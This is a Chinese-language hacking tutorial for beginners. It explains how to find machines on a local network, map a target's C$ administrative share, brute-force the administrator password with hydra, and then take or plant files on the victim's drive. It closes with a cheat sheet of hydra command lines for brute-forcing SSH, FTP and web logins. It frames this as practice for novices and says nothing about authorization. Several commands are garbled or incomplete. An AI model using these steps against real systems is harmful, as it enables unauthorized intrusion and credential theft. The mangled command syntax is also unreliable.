简单的内网渗透教程

给大家分享一个简单且老掉牙的方法去获得目标计算机的C盘。

工具：hydra爆破工具（使用方法在文章末尾）

首先我们需要获取对方的ip，在cmd中输入命令 arp a 或 net view 查看局域

网内其他计算机目标。

假设我们的目标计算机的IP地址是192.168.1.1 我们先ping一下它看是否能联

通 ping 192.168.1.1。在保证其ping通的情况下使用命令 net use

k:192.168.1.1c$其原理其实就是将162.168.1.1的c盘为我们的k盘。当然要保

证其本地开启的共享是否有C盘。查看本地开启的共享可以使用命令 net share。

在输入前面net use k:192.168.1.1c$的命令之后会让你输入该IP下的用户名和

密码。

假设我们通过某些手段得知了该用户名为administrator（其实就是管理员）之后，

我们可以使用hydra来帮助我们进行爆破密码。我们将事先准备好的hydra文件

放入C盘的根目录下，再将事先准备好的字典()放入hydra的文件夹中。

输入命令 cd hydra 回车 -l administrator -p 192.168.1.1回车。

在爆破成功后再次输入命令net use k:192.168.1.1c$并填入用户名和密码，我

们便可以在自己的电脑上看到该用户共享过来的C盘。那么有了C盘我们便可

在这C盘之上放入我们需要的或者是取出我们需要的就好了。

手段比较老但是可以让小白们来试试练练手，其中的命令使用方式在

Windows10中可能不太一样希望自己在查询之后在使用。

以下奉上hydra的一些使用方法：

1、破解ssh：

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh

hydra -l 用户名 -p 密码字典 -t 线程 -o -vV ip ssh

2、破解ftp：

hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV

hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

3、get方式提交，破解web登录：

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get

/admin/

4、post方式提交，破解web登录：

hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form

"/admin/:username=^USER^&password=^PASS^&submit=login:sorry

password"

hydra -t 3 -l admin -P -o -f 10.36.16.18 http-post-form

":id=^USER^&passwd=^PASS^:"

（参数说明：-t同时线程数3，-l用户名是admin，字典，保存为，

username or

-f 当破解了一个密码就停止， 10.36.16.18目标ip，http-post-form表示破解是

采用http的post方式提交的表单密码破解,